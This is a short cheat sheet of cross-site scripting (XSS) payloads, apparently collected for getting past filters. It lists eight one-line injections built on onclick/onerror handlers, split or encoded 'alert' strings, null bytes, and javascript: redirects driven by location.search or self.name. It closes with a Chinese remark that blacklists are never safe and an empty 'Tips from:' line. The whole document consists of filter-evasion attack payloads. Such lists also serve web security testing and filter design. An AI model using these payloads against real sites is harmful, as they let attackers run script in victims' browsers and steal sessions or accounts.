Some XSS Tips

  • <input onclick="window.onerror=alert;throw 1">
  • <input onclick="location="javascript:aler'+'t%2'+'81%2'+'9'">
  • <input onclick="top.onerror=top['ale'+'rt'];throw 1">
  • <input onclick="outerHTML=URL">
  • "onblur=javascript:window.onblur=al%00ert;throw 1
  • ()&xss="onclick=a=location.search;location.href="javascript:a"+"lert"+a[1]+a[2]//
  • <input onclick="location=self.name">
  • <input onclick="document.domain=''">

黑名单终归是不安全的。

Tips from: